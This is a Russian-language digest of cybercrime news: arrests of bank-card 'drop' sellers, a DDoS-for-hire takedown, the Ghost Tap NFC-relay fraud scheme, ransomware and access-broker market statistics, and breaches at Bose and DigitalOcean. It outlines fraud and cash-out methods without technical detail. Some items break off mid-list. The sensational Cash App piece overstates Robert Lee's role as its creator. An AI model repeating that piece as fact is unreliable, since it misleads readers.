Для решения этой потенциальной проблемы Google планирует обязать пользователей IP Protection проходить аутентификацию на прокси-сервере, запретить прокси- серверам привязывать запросы к определенным учетным записям, а также установить ограничение скорости для предотвращения DDoS-атак.
После чего выйти на след преступника смогли исследователи из израильской компании Hudson Rock, которые по итогу раскрыли его настоящую личность.
Известный в шаркнете как La_Citrix брокер начального доступа активен с 2020 года и занимается взломом организаций, компрометируя серверы Citrix, VPN и RDP, продает к ним доступ, а также сливает логи инфостилеров.
Но один раз что-то пошло не так и хакер умудрился продать на сторону доступ к своему же ПК, не подозревая, что в числе прочих целей заразил и свою машину.
Идентифицировать La_Citrix получилось, изучая других хакеров, которые были заражены инфостиллерами и имели доступ к известным даркнет-площадкам. В частности, на exploit.in он и был замечен.
Hudson Rock не упустили возможность и внимательно исследовали комп La_Citrix, который использовался для совершения вторжений в сотни компаний.
На компьютере хранились учетные данные сотрудников почти 300 организаций, а в браузере - корпоративные учетные данные, используемые для взлома.
Как выяснили ресерчеры, La_Citrix в своей работе полагался на стиллеры, с помощью которых нацеливался на корпоративные учетные данные, которые затем использовались для вторжения в сети жертв. Причем использовал во всех атаках лишь свой ПК.
Дальнейший анализ компьютера злоумышленника также помог фирме, занимающейся кибербезопасностью, установить его настоящую личность и местонахождение, а также собрать обширную доказательную базу.
Исследователи Hudson Rock заявили, что обладают сведениями в отношении тысячи хакеров, допустивших аналогичные ошибки, и намерены направить обнаруженные доказательства в соответствующие правоохранительные органы.
Более того, они ожидают, что число случаев заражений похитителями будет только расти, причем в геометрической прогрессии.
source: hudsonrock.com/blog/prominent-threat-actor-accidentally-infects-own- computer-with-info-stealer
Главным управлением цифрового развития предварительного следствия Следственного комитета совместно с ГУПК МВД задержаны 29-летняя женщина и 19-летний парень, которые незаконно распространяли данные для доступа к расчетным счетам и реквизиты банковских платежных карточек преступным группам. Последние использовали доступ к управлению банковскими счетами в целях обеспечения финансирования незаконного оборота наркотиков и совершения интернет-мошенничеств в отношении белорусских граждан.
За каждую проданную банковскую карточку либо данные для доступа к расчетному счету фигуранты получали денежные средства в размере от 50 до 130 рублей.
В преступную деятельность они вовлекли более 100 своих друзей и знакомых, которые также получали незаконный доход за оформление на свое имя банковских карт либо передачу своих паспортных данных и абонентских номеров для регистрации личных кабинетов в интернет-банкинге.
На основании собранных доказательств фигурантам предъявлено обвинение по ч. 2 ст. 222 (незаконный оборот средств платежа) Уголовного кодекса Беларуси. К ним с санкции прокурора применена мера пресечения в виде заключения под стражу.
В ходе допросов обвиняемые дали признательные показания и раскаялись в содеянном.
Расследование уголовного дела продолжается.
Справочно: Санкция вышеуказанной статьи предусматривает наказание до 10 лет лишения свободы.
Следственный комитет напоминает, что уголовный Закон предусматривает ответственность за незаконное распространение из корыстных побуждений реквизитов банковских платежных карточек и аутентификационных данных, посредством которых возможно получение доступа к банковским счетам.
• Source: hxxps://sk.gov.by/ru/news-ru/view/presechena-prestupnaja- dejatelnost-dvux-krupnyx-dropovodov-oni-pod-strazhej-12733
+++++
Следственное управление УСК по Гомельской области установило обстоятельства уголовного дела о незаконном распространении реквизитов банковских платежных карт, используемых для вывода похищенных денег. Об этом сообщили в Следственном комитете.
Как рассказали в следственном ведомстве, 17-летняя студентка гомельского колледжа приняла предложение знакомого о незаконном заработке. Сообщается, что девушка приходила в банки, открывала счета и получала привязанные к ним карты. После этого она передавала банковские карты или реквизиты знакомому. Она также передавала ему данные для входа в личный кабинет интернет-банкинга, что позволяло молодому человеку от имени фигурантки регистрировать виртуальные карты и электронные кошельки. За каждое выполненное задание студентка получала около Br100.
Сообщается, что ее знакомый передавал реквизиты злоумышленникам, которые использовали их для вывода денег, похищенных мошенническим путем. После этого он отслеживал поступление денег на счета обвиняемой и разменивал их на криптовалюту.
В настоящее время молодой человек отбывает наказание в колонии. Студентка находится под стражей и ожидает суда. Действия обвиняемой квалифицированы по ч. ч. 1,2 ст. 222 УК.
В ходе обысков раскрылся заработок злоумышленников и активность пользователей сервиса.
Полиция Польши арестовала двух человек, которые обвиняются в причастности к созданию и эксплуатации сервиса DDoS-атак по найму (DDoS-for-hire), также известного как «бутер» (booter) или «стрессер» (stresser), действовавшего с 2013 года.
Аресты является частью координированной международной правоохранительной операции « Operation PowerOFF », направленной на пресечение деятельности онлайн-платформ, позволяющих любому желающему запустить массовую DDoS-атаку против любой цели за определенную плату.
В операции принимали участие Европол, ФБР и правоохранительные органы Нидерландов, Германии и Бельгии под руководством Объединённой группы по борьбе с киберпреступностью (J-CAT).
Сотрудники Центрального бюро по борьбе с киберпреступностью Польши (CBZC) задержали двух подозреваемых и провели 10 обысков, в ходе которых собрали ценные данные с сервера злоумышленников, расположенного в Швейцарии.
Доказательства, полученные с серверов подозреваемых, раскрыли следующую информацию:
Польская полиция также нашла убедительные доказательства управления и администрирования преступного домена на компьютере одного из подозреваемых.
Операция PowerOFF — это долгосрочная международная операция правоохранительных органов, которая привела к закрытию десятков других крупных платформ DDoS-атак по найму. ФБР ещё в декабре 2022 года захватило 48 доменов booter-сервисов , при этом 10 ранее пресеченных платформ зарегистрировали новые домены, позволяющие им оставаться онлайн.
А в марте Национальное агентство по борьбе с преступностью Великобритании (NCA) создало несколько поддельных сайтов «DDoS-атак на заказ» (DDoS-for-hire) для выявления киберпреступников, которые используют эти сервисы для атак на организации. Несколько тысяч человек получили доступ к поддельным сайтам, которые выглядели как настоящий сервис DDoS-for-hire. Однако вместо предоставления доступа к DDoS-инструментам сайты просто собирали информацию о посетителях.
Убит cоздатель сверхпопулярного «платежного сервиса для бандитов» Cash App
Создатель криптовалюты MobileCoin и платежного сервиса Cash App Роберт Ли погиб от рук преступника, напавшего на него с ножом. Cash App очень популярен среди нарушителей закона – он позволяет совершать транзакции и выводить деньги, сохраняя почти полную анонимность. Cash App настолько любим преступным сообществом, что многие исполнители слагают об этом песни.
Скорая помощь успела доставить Ли в больницу, но врачи не смогли ему помочь. Он скончался от полученных ранений.
Созданный Робертом Ли сервис Cash App действительно стал быстрым и удобным способом передачи денег, например, для оплаты того или иного товара. К его преимуществам пользователи относят моментальное поступление денег и легкость вывода средств, а также минимальный контроль над транзакциями – для перевода достаточно указать лишь минимальный набор информации, которого будет недостаточно, чтобы вычислить личность отправителя или получателя.
Этой особенностью Cash App активно пользуются различные преступники, пишет портал FastCompany. Сервис не проверяет подлинность данных, указанных пользователем при регистрации, вследствие чего даже если один профиль по тем или иным причинам попадет под блокировку, мошенникам не составит труда зарегистрировать еще несколько фальшивых учетных записей.
По информации FastCompany, Cash App упоминается в сотнях хип-хоп песен, в текстах которых говорится, что их исполнители используют сервис для всего противозаконного. Это и торговля наркотиками, и проституция, и оплаты услуг наемных убийц, и пр. К слову, создатель Twitter Джек Дорси лично хвастался популярностью приложения среди музыкальных исполнителей, притом дважды – в 2020 и 2021 гг. на ежегодной конференции инвесторов JPMorgan.
Как пишет FastCompany, в США существует банда преступников, названная в честь Cash App. В 2021 г. власти Балтимора обвинили ее членов в распространении запрещенных препаратов.
В Астраханской области вынесли обвинительный приговор по уголовному делу о вымогательских DDoS-атаках. Несмотря на криминальное прошлое, 29-летнему жителю г. Харабали дали всего 3 года, да и то условно.
Согласно сообщению пресс-службы УМВД по Астраханской области от 15 февраля, ответчику инкриминировали совершение преступлений, предусмотренных ч. 1 ст. 274.1 УК РФ (использование компьютерных программ, предназначенных для неправомерного воздействия на критическую информационную инфраструктуру РФ, до пяти лет лишения свободы со штрафом до 1 млн рублей).
Следствием и судом установлено, что ответчик уже привлекался к уголовной ответственности — в 2013 году по ст. 272 и 273 УК РФ (неправомерный доступ к компьютерной информации и создание, использование и распространение вредоносных компьютерных программ).
Летом 2021 года мужчина решил подработать вымогательством, используя накопленный опыт. Он отыскивал в интернете ресурс крупной компании и по 3-4 дня докучал ей DDoS-атаками. Положив сайт, злоумышленник требовал плату за прекращение огня.
Выявлены четыре жертвы вымогательства. Получить выкуп дидосеру так и не удалось: его задержали правоохранители.
На Южном Урале перед судом предстанет 18-летний житель Чувашской Республики. Молодой человек умышленно получил неправомерный доступ к персональным данным граждан с целью дальнейшего оформления на их имя займов в различных микрофинансовых организациях.
Обвиняемый, обладая логинами и паролями пользователей информационной системы, вошел в их учетные записи, скопировал оттуда личные данные и ввел их на сайтах микрофинансовых организаций при подаче заявок на кредиты. Суммы онлайн-займов варьировались от 5 000 до 25 000 рублей. Таким образом, обвиняемый оформил на незнакомых ему граждан России, в том числе потерпевших из Челябинска, кредитов на общую сумму свыше 170 тысяч рублей. На вырученные деньги молодой человек купил брендовые вещи. Следствием установлено, что противоправную деятельность обвиняемый осуществлял с марта 2022 по июнь 2023 года. По обстоятельствам совершенного преступления сотрудниками следственной части СУ УМВД России по г. Челябинску были возбуждены уголовные дела по признакам преступлений, предусмотренных частью 2 статьи 272 «Неправомерный доступ к компьютерной информации» и частью 1 статьи 159 УК РФ «Мошенничество». Следователями проделана значительная работа, направленная на установление всех обстоятельств произошедшего, собрана достаточная доказательная база.
Злоумышленник был задержан в Республике Чувашия сотрудниками управления по борьбе с противоправным использованием информационно-коммуникационных технологий ГУ МВД России по Челябинской области. На период следствия обвиняемому избиралась мера пресечения в виде подписки о невыезде и надлежащем поведении.
В настоящее время расследование уголовного дела завершено и с утвержденным обвинительным заключением направлено в Центральный районный суд г. Челябинска для рассмотрения по существу.
hacked-100-hackers-5c3c313e8a1a)
… Or script kiddies I could say
corneacristian.medium.com
Исследователи безопасности из компании ThreatFabric обнаружили новую тактику обналичивания украденных средств под названием «Ghost Tap». Эта схема позволяет киберпреступникам использовать NFC-технологию для анонимных операций с украденными данными кредитных карт, привязанными к мобильным платёжным сервисам, таким как Google Pay и Apple Pay.
Суть метода заключается в релейной передаче NFC-трафика между устройствами, что даёт возможность проводить транзакции на значительном расстоянии от фактического местонахождения карты. Преступники используют легкодоступные инструменты, такие как NFCGate, изначально разработанные для исследовательских целей. Такой подход позволяет масштабировать операции, задействуя «мулов» для покупок в разных географических точках за короткое время.
Для реализации Ghost Tap мошенники связывают украденные карты с устройствами, получая OTP-коды через фишинговые сайты или мобильные вредоносные программы. Затем данные карты передаются устройству «мула», который совершает покупки в магазинах. Это затрудняет обнаружение преступников, так как транзакции выглядят как обычные операции с одного устройства.
Ключевая проблема для банков и платёжных систем — сложность в выявлении этих операций. Использование режима «в самолёте» и небольшие суммы покупок затрудняют срабатывание антифрод-систем. При этом преступники могут быстро тратить крупные суммы, разделяя их на множество мелких транзакций.
Растущая популярность NFC-атак связана с отсутствием эффективных механизмов обнаружения. Для противодействия таким схемам финансовым организациям требуется усовершенствование систем мониторинга, способных учитывать несовпадение местоположений устройства и терминала, а также подозрительное поведение клиентов.
Ghost Tap наглядно демонстрирует, как технологические инструменты, созданные для исследовательских целей, превращаются в мощные мошеннические средства. Для борьбы с такими угрозами требуется сотрудничество между финансовыми организациями, разработчиками технологий и правоохранительными органами. Только совместные усилия помогут остановить эволюцию подобных схем.
threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay
Четверо минчан задержаны за перепродажу реквизитов банковских карт и абонентских номеров. Об этом БЕЛТА сообщили в Следственном комитете.
Как отметили в Следственном ведомстве, минчане все чаще ищут работу в социальных сетях и мессенджерах. Зачастую соискателей не останавливает даже отсутствие официального трудоустройства и предоставления необходимых социальных гарантий. Кроме того, они порой даже не задумываются, что некоторые подобные предложения могут быть незаконными.
Следователи столицы не единожды обращали внимание, что оформлять банковские карты и передавать их реквизиты за денежное вознаграждение является уголовно наказуемым деянием. Тем не менее, некоторые по-прежнему становятся фигурантами подобных уголовных дел.
В июне прошлого года 27-летней минчанке от подруги поступило предложение о подработке. Все, что требовалось, - это оформлять на свое имя банковские карты и абонентские номера, данные о которых необходимо передавать неизвестному. Женщина согласилась на это предложение и даже привлекла к заработку своего 50-летнего отца. На следующий день они встретились с 19-летней подругой фигурантки и ее парнем. После этого они отправились в банки и к мобильным операторам для выполнения предложенной им работы.
Уже из разговора с сотрудниками милиции обвиняемые узнали, что оформленные ими счета и номера использовались в преступных целях. Всего они передали злоумышленникам реквизиты от девяти банковских карт и трех номеров. При изучении личностей фигурантов установлено, что ранее к уголовной ответственности они не привлекались. 19-летний парень учится в одном из университетов Минска, остальные не имеют работы.
Следователь допросил обвиняемых и свидетелей, осмотрел информацию с мобильных телефонов фигурантов. К материалам дела приобщены сведения о движении денежных средств по карт-счетам. Действия минчан квалифицированы по ч.1 ст.222 (незаконное распространение реквизитов банковских платежных карточек и аутентификационных данных) Уголовного кодекса. К 19-летней обвиняемой применена мера пресечения в виде подписки о невыезде и надлежащем поведении, к остальным фигурантам - в виде запрета определенных действий.
Примерно 40 организаций, скомпрометированных в 2020 году, в 2021 году вновь стали жертвой кибератаки, но с участием другой группировки.
За последний год в индустрии вымогательского-ПО-как-услуги (Ransomware-as-a- Service, RaaS) появилось много «франчайзинговых» сделок и новых партнерских отношений. На сегодняшний день RaaS стала одной из самых многочисленных и опасных угроз безопасности предприятий. Киберпреступники получают большую прибыль от сдачи в аренду своих программ-вымогателей, особенно если они используются против крупных компаний, способных платить огромные деньги за расшифровку своих данных.
За последние годы отрасль развилась и теперь включает в себя другие роли — разработчиков вредоносных программ, носителей языка для ведения переговоров и брокеров начального доступа, которые предлагают сетевой доступ к целевой системе, тем самым ускоряя операции RaaS.
Сайты утечек данных стали обычным явлением. Когда группа вымогателей атакует жертву, они могут украсть конфиденциальную корпоративную информацию перед шифрованием систем. Затем киберпреступники будут угрожать опубликовать эти данные, если не будет произведена уплата выкупа.
Специалисты компании KELA опубликовали отчет об общих тенденциях операторов программ-вымогателей за 2021 год. Число крупных организаций, ставших жертвами кибератак, увеличилось с 1460 до 2860. В общей сложности 65% отслеживаемых в прошлом году сайтов утечек управлялись новыми киберпреступниками. Большинство жертв находятся в развитых странах, включая США, Канаду, Германию, Австралию, Японию и Францию.
Производственные предприятия, промышленные и технологические компании подвергаются наибольшему риску атак операторов программ-вымогателей. По данным KELA, примерно 40 организаций, скомпрометированных в 2020 году, в прошлом году повторно стали жертвой кибератаки, но уже с участием другой группировки. Предположительно, хакеры использовали один и тот же первоначальный доступ.
Хотя некоторые взломы могут быть несвязанными, похоже, что появляются «франчайзинговые» предприятия. Trend Micro ранее связала группировки Astro Team и Xing Team, которым было разрешено использовать программу-вымогатель Mount Locker под своими торговыми марками. Некоторые из жертв были повторно упомянуты на сайтах утечек данных Astro/Xing Team и Mount Locker. Кроме того, в 2021 году в блогах Quantum, Marketo и Snatch было упомянуто 14 пострадавших организаций.
source: ke-la.com/blog | trendmicro.com/fr_fr/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html
«Киберпреступность замедляет экономику, разрушает человеческие жизни, убивает хорошие идеи, приводит к конфликтам, коррупции и несправедливости», — убежден Дмитрий Волков, сооснователь и генеральный директор Group-IB. Нетерпимость к киберпреступности — zero-tolerance for cybercrime — один из главных принципов в компании, которую он сейчас возглавляет. Вот уже 10 лет подряд Group-IB проводит международную конференцию CyberСrimeCon, на которой представители ведущих мировых вендоров из сферы кибербезопасности, правоохранительных органов, Интерпола и Европола, обсуждают тенденции развития киберкриминальной индустрии, анализируют хакерские атаки и делятся прогнозами, как изменится ландшафт угроз для мировой экономики. Все последние новости и инсайды о киберпреступности — с полей CyberСrimeCon.
Экосистема вымогателей
Киберугрозой №1 для бизнеса, по словам Дмитрия Волкова, второй год подряд являются ransomware — программы-вымогатели. В отличие от некогда популярных целевых атак на банки этот криминальный бизнес сравнительно прост и легко масштабируется — злоумышленники проникают в инфраструктуру компаний, шифруют (а в некоторых случаях и похищают) их данные, а затем требуют выкуп. Суммы превышают десятки, а порой и сотни миллионов долларов.
Например, только в России количество атак шифровальщиков в 2021 году увеличилось на 200%. Здесь рекорд по максимальной сумме запрашиваемого выкупа — 250 млн рублей поставила группировка OldGremlin, хотя до «мирового рекорда» вымогателей из Hive, рассчитывающих получить от немецкого холдинга MediaMarkt $240 млн (по курсу ЦБ РФ на 20/12 — ок. 17,8 млрд руб.), им еще далеко.
Dharma, Crylock и Thanos — три наиболее активных шифровальщика, атаковавших бизнес на территории постсоветского пространства, в общей сложности они совершили более 300 атак.
Впрочем, вымогателей интересуют не только деньги. В своем докладе на CyberСrimeCon Антонио Пироцци, руководитель группы по анализу киберугроз SentinelOne, назвалEvil Corp «одной из самых опасных хакерских группировок [в мире], являющейся одновременно и киберпреступной, и шпионской».
Эксперты Group-IB отмечают три фактора, из-за которых число атак и доходы операторов программ-шифровальщиков растут фантастическими темпами. Первый — это популярность так называемых партнерских программ (Ransomware-as-a- Service), куда группировки привлекают партнеров, делясь с ними процентом от выкупа. Всего за 2020 и 2021 годы появились 34 новые партнерские программы. Как рассказал Волков, популярность этого криминального бизнеса выросла настолько, что сами владельцы хакерских форумов выступили против активной рекламы программ-шифровальщиков «No more ransom!», чтобы привлекать внимание правоохранителей и журналистов к своему теневому бизнесу.
Второй — рост числа Data Leak Site. Это ресурсы в даркнете, где операторы шифровальщиков выкладывают скомпрометированные данные компаний, если жертва не хочет платить выкуп. Число таких ресурсов за год (с середины 2020-го по середину 2021-го) выросло в два раза — с 13 до 28. А вот число компаний, чьи данные появились на таких сайтах, выросло на 935% — до 2371. При этом в Group- IB отмечают, что на такие сайты выкладывают данные только 10% атакованных компаний, а около 30% жертв вымогателей предпочитают... платить.
Как рассказал Волков, лидером по количеству жертв, выложенных операторами программ-шифровальщиков на DLS, по-прежнему являются США (49,2%). За ними следуют Канада, Франция и Великобритания. А вот среди индустрий явного лидера нет, но среди самых атакуемых — производство (9,6%), недвижимость (9,5%) и транспорт (8,2%). Самой агрессивной группой по числу выкладываемых на DLS- сайты данных является Conti — на ее счету 361 компания-жертва. Хотя в прошлом году лидерами были Maze (259) и Egregor (204), которых сейчас в топ-5 группировок не оказалось.
Один из основных факторов успеха шифровальщиков — сотрудничество с брокерами, которые продают вымогателям доступы в сети атакованных компаний.
Партнеры повсюду
Брокеры первичного доступа — это участники партнерских программ, чаще всего профессиональные пентестеры, которые ищут уязвимости в инфраструктуре компаний, а затем перепродают их операторам шифровальщиков. Как заметил Волков, этот сегмент андеграунда активно растет. За отчетный период специалисты Group-IB обнаружили 229 брокеров, хотя в прошлом году их было 86. «Мы находимся лишь в начале истории. В будущем мы увидим больше брокеров. И конкуренция между ними снизит цену за начальный доступ [в инфраструктуру]», — предупреждает Волков.
По оценке Group-IB, объем рынка продажи доступов в сети скомпрометированных компаний составляет более $7 млн (ок. 520 млн руб.).
За последние месяцы на продажу было выставлено более 1000 доступов к сетям компаний. А 35% всех доступов было продано пятью основными брокерами. По словам Волкова, атаки по странам совпадают с программами-шифровальщиками, но есть разница в индустриях. Здесь самый популярный сегмент — правительственный сектор. «В дарквебе есть спрос на такие данные», — рассказал Волков. Отдельно Group-IB выделяет финансовый сектор. Здесь количество продавцов доступов к инфраструктуре финансовых организаций выросло с 18 до 47, а число продаваемых доступов выросло на 203% — с 31 до 95.
Интересный момент: большинство брокеров первичного доступа — русскоязычные. Отсюда наименьшее число атак в России и СНГ, так злоумышленники пытаются избежать ареста. Другую любопытную деталь в своем выступлении отметить руководитель группы исследования киберпреступности в Group-IB Дмитрий Шестаков. По его словам, до 2017 года услуги брокеров начального доступа были не столь популярны — хакеры не очень понимали, как на этом можно заработать. До мировых эпидемий шифровальщиков WannaCry, NotPetya и BadRabbit вирусы- шифровальщики атаковали в основном физических лиц. И только после 2017-го операторы шифровальщиков в качестве целей выбрали крупный и средний бизнес, началась охота на крупную дичь — Big Game Hunting.
Одним из тех, кто вывел продажу доступов в инфраструктуру компаний на новый уровень, был хакер Fxmsp. По словам Шестакова, именно он стал продавать доступы на регулярной основе. «Он понял, что его целевая аудитория — группировки хакеров-вымогателей. И он как хороший рекламщик выкладывал именно ту информацию, которая могла заинтересовать их», — рассказывает Шестаков. Хакер Fxmsp смог получить доступ к 135 компаниям в 44 странах, а его заработок оценивают в $1,5 млн (ок. 111,4 млн руб.). Правда, в 2019-м он прекратил публичную активность, но его так и не поймали.
Новая жизнь старой угрозы
Фишинговые ресурсы, с помощью которых злоумышленники пытаются украсть деньги или конфиденциальную информацию, — чаще всего данные банковских карт, хотя и являются одной из старейших киберугроз, до сих пор актуальны. Дополнительный толчок развитию фишинга, как рассказывает Волков, дала пандемия, из-за которой люди стали намного чаще совершать интернет-покупки. В сети появляются клоны популярных маркетплейсов, сервисов доставки или платежных систем, которые подменяют данные о реальном торговце, тем самым обманывая банки и забирая деньги покупателей себе. По словам Волкова, ежедневно Group-IB фиксирует в России около 1400 фальшивых трансакций.
По оценкам экспертов Group-IB, существует около 70 фишинговых и мошеннических партнерских программ.
«Злоумышленники, занимающиеся фишингом, адаптируются. Они меняют стратегию и тактику в зависимости от ситуации. Из-за пандемии очень много людей пользуются онлайн-покупками, отсюда рост фишинговых угроз», — признает Хорхе Розаль Косано, руководитель отдела AP Terminal, Европейского центра по борьбе с киберпреступностью, Европол. Он обращает внимание и на еще один вид фишинга — мошенничество в инвестиционной сфере. По его словам, появилось очень много фейковых сайтов, нацеленных на владельцев криптовалют.
Драйвером роста этого рынка тоже являются партнерские программы. Как рассказывает Волков, аналитики Group-IB обнаружили около 70 партнерских программ по фишингу, которые активно ищут партнеров. При этом за год они создали около 2000 сообщений о поиске партнеров на форумах. А 40 самых популярных партнерских программ смогли привлечь около 5000 новых мошенников. «Все это открывает новые возможности для того, чтобы мошенники могли скомпрометировать как можно больше данных», — отмечает Волков.
Управление таким числом партнеров требует автоматизации. По словам CEO Group- IB, такой платформой стал мессенджер Telegram. «Telegram-боты позволяют автоматизировать много рутинных задач — регистрация и инструктаж новых партнеров, уведомления о платежах, сбор скомпрометированной информации и т. д.», — рассказывает Волков. Если год назад Telegram использовали 0,88% партнерок, то теперь его доля 6,6%. «Мы предполагаем, что не только Telegram, но и другие мессенджеры с ботами будут использоваться мошенниками в будущем. Это позволит партнеркам развиваться быстрее, а отслеживать их станет сложнее», — говорит гендиректор Group-IB.
Сменились вкусы
Несмотря на бурный рост программ-шифровальщиков, крупнейшим по объему денег считается сегмент кардинга — воровство данных банковских карт. Но в этом году этот рынок заметно просел — на 26%, с $1,9 млрд (ок. 141 млрд руб.) до $1,4 млрд (ок. 104 млрд руб.). Этот рынок состоит из двух частей — продажи дампов (содержимого магнитных полос карт) и текстовых данных (номер, имя, код CVV). Падение произошло во многом за счет сегмента дампов. Во-первых, был закрыт крупный магазин Joker's Stash, а во-вторых, средняя цена дампа заметно упала — $21,88 до $13,84.
Правда, сегмент текстовых данных банковских карт продолжил расти — на 36%. Там выросла и средняя цена — с $12,78 до $15,2. «Из-за коронавируса увеличилось количество онлайн-покупок. А поскольку онлайн-платформы недостаточно защищены, мошенники могут с помощью JS-снифферов украсть данные банковских карт», — отметил в своем докладе Хорхе Розаль Косано из Европола. По его словам, в рамках полицейской операции Carding Action 2021 Group-IB второй год подряд передает полицейским платежные данные скомпрометированных банковских карт, в итоге удалось предотвратить ущерб банков Европы на €54 млн.
На этом фоне практически исчезли целевые атаки на финансовые учреждения, хотя еще несколько лет назад это был основной способ для криминальной хакерской группы заработать десятки миллионов долларов. Исключением стали два региона — Россия и Африка. «В России, скорее всего, за атакой стоит известная группа, которая вернулась после долгой паузы, — рассказал сооснователь Group-IB. — В Африке мы обнаружили злоумышленников, которые сфокусированы на местных банках. Эта группировка не сильно развита, но весьма эффективна».
Не нужно бояться
Как правоохранительные органы могут повысить эффективность своей борьбы с хакерами? Об этом в своем выступлении подробно говорил Крейг Джонс, директор по расследованию киберпреступлений из Интерпола. Киберпреступность трансгранична — она может атаковать цели из любой точки мира. А вот правоохранительные органы по-прежнему проводят свои расследования исключительно на национальном уровне, локально. «Пока они не делятся информацией и данными с международными партнерами, киберпреступники пользуются этим», — констатирует Джонс.
Кроме того, многие расследования наталкиваются на межгосударственные и законодательные противоречия, недостаточное техническое развитие разных стран. «Нам нужно доверять друг другу. Не нужно бояться делиться [данными], — убежден Джонс. — В Интерполе наша модель доверия строится на сотрудничестве с государственными и частными партнерами. И частные партнеры могут быть более эффективными: отчеты, которые публикуют частные компании, зачастую лучше тех, что выпускают правоохранительные органы».
В качестве успешного примера сотрудничества представитель Интерпола привел совместные международные операции с участием Group-IB — Falcon и Lyrebird. В первом случае в конце 2020 года полиция Нигерии совместно с Group-IB ликвидировала преступную группу, которая скомпрометировала около 500 000 государственных и частных компаний из 150 стран мира.
Во втором — в мае 2021 года в Марокко местной полицией был задержан злоумышленник, известный в сети как DrHeX. Начиная с 2009 года он занимался фишингом, дефейсом сайтов, разработкой вредоносного программного обеспечения, мошенничеством и кражей данных банковских карт.
А вот третья операция — Cyclone, в ходе которой Интерполу удалось обнаружить и захватить на Украине серверы операторов вируса-шифровальщика Conti, атаковавшего Министерство здравоохранения Ирландии, еще не закончена. Значит, экспертам будет о чем рассказать на следующей конференции CyberСrimeCon 2022.
Суд вынес решение в отношении двух злоумышленников за взлом банкомата Ощадбанка при помощи специального ПО.
По данным следствия, в феврале 2020 года, ранее судимый украинец вместе со своим сообщником приехали в г. Жмеринка (Винницкая область) с целью совершения кражи денежных средств. Для этого преступники направились к одному из банкоматов Ощадбанка, где используя липкую ленту заклеили видеокамеры и при помощи газового паяльника повредили защитную панель банкомата. Далее злоумышленники через отверстие в корпусе банкомата присоединили USB- разветвитель с флэш-накопителем, содержащий два файла «cm17F.exe» и «Stimulator22.exe». Добраться к деньгам преступники не успели, т.к. сработала система сигнализации банкомата и, оперативно прибывшие на место происшествия полицейские, задержали злоумышленников.
Вышеуказанное программное обеспечение, согласно заключению эксперта, определяется как вредоносное, функциональным назначением которого является вмешательство в работу программной части АТМ-терминала (банкомата) с целью инициализации выдачи купюр с кассет его диспенсера.
Суд признал мужчин виновными в совершении преступлений, ответственность за которые предусмотрена ч. 3 ст.15, ч.3 ст. 185, ч.2 ст. 15, ч.2 ст. 361 УК Украины, и назначил одному из них наказание в виде трех лет и шести месяцев лишения свободы, а другому, т.к. у него была непогашенная судимость - в виде четырех лет тюрьмы.
Производитель аудиотехники Bose заявил, что стал жертвой атаки неназванного шифровальщика, произошедшей еще 7 марта 2021 года. Атака была направлена на системы компании в США, и хотя происходящее заметили в тот же день, хакеры успели развернуть шифровальщика во внутренней сети Bose.
В конечном итоге сеть компании была восстановлена, однако неизвестно, заплатила ли Bose выкуп злоумышленникам или же восстановление произвели из резервных копий.
Сообщается, что многомесячное расследования инцидента выявило, что вымогатели получили доступ к внутренним файлам отдела кадров. В этих файлах хранились данные о сотрудниках Bose (бывших и настоящих), включая имена, номера социального страхования и информацию о заработной плате. Подчеркивается, что злоумышленники «взаимодействовали с ограниченным набором папок». То есть у компании есть доказательства, подтверждающие, что хакеры получили доступ к закрытой информации, однако определить, были файлы украдены или нет, не представляется возможным.
Bose наняла юридическую фирму, чтобы уведомить всех пострадавших сотрудников о случившемся и предложить им 12 месяцев бесплатных услуг по защите личных данных. Также компания сообщает, что приняла следующие меры для улучшения защиты:
Источник: xakep.ru/2021/05/25/bose-breach/
Провайдер облачного хостинга DigitalOcean уведомил своих клиентов, что из-за ошибки допустил утечку их платежных данных, сообщает издание TechCrunch.
В электронном письме, которое получили пострадавшие, говорится, что некая «брешь» позволила неавторизованному пользователю получить доступ к платежным данным клиентов за период с 9 апреля 2021 года по 22 апреля 2021 года.
«Неавторизованный пользователь получил доступ к некоторым данным вашего платежного аккаунта через уже исправленную нами ошибку. Эта уязвимость затронула небольшой процент наших клиентов», — гласит письмо.
Click to expand...

В итоге в руки посторонних попали имена клиентов (необходимые для выставления счетов), адреса для выставления счетов, сроки действия платежных карт, последние четыре цифры номеров карт и название банка.
Тайлер Хили, вице-президент по безопасности DigitalOcean, заявил журналистам TechCrunch, что от утечки пострадал лишь 1% биллинговых профилей клиентов.
Более подробных данных о произошедшем в компании пока не раскрывают. Пока неизвестно, какая именно уязвимость послужила причиной данной утечки.
Источник: xakep.ru/2021/04/29/digitalocean-leak/
Эксперты Red Canary, Malwarebytes и VMWare Carbon Black обнаружили малварь Silver Sparrow, ориентированную на пользователей Mac. По данным специалистов, вредонос заразил уже 29 139 систем в 153 странах мира. Больше всего пострадавших находятся в США, Великобритании, Канаде, Франции и Германии.
Официальные отчеты гласят, что пока исследователям неизвестно, как именно распространяется Silver Sparrow. Вероятно, он был скрыт внутри вредоносной рекламы, пиратских приложений или поддельных обновлений Flash, то есть использовал один из классических векторов распространения Mac-малвари.
Более того, назначение Silver Sparrow и конечную цель малвари установить пока тоже не удалось. Дело в том, что когда Silver Sparrow заражает систему, он просто ожидает новых команд от своих операторов. Однако за то время, что исследователи наблюдали за малварью, никаких команд ей не поступало вообще.
При этом эксперты допускают, что вредонос обнаруживает аналитические инструменты, «замечает», что за ним следят, и лишь поэтому остается неактивным, и не загружает пейлоады второго уровня. Судя по количеству заражений, эта малварь вряд ли была чьим-то неудачным экспериментом ли шуткой.
Отдельно подчеркивается, что Silver Sparrow способен работать даже в системах с новым чипом Apple M1 (что еще раз подтверждает серьезные намерения его авторов). Это делает Silver Sparrow всего второй обнаруженной угрозой, адаптированной для M1. Напомню, что первая малварь такого рода была обнаружена всего несколько дней назад.

Исследователи пишут, что нашли две разные версии малвари: одна была
скомпилирована только для Intel x86-64 и загружена в VirusTotal 31 августа
2020 года (updater.pkg), а вторая версия появилась 22 января 2021 года, и уже
совместим с архитектурами Intel x86-64 и M1 ARM64 (update.pkg).
Представители Apple сообщили изданию MacRumors, что они уже отозвали сертификаты разработчиков, которые использовались для подписи малвари. Эта мера должна предотвратить дальнейшее распространение вредоноса и заражение новых Mac.
Источник: xakep.ru/2021/02/24/silver-sparrow/
Правоохранители вышли на мужчину, который по их версии возможно был причастен к совершению преступления, передает отдел коммуникации полиции Луганской области.
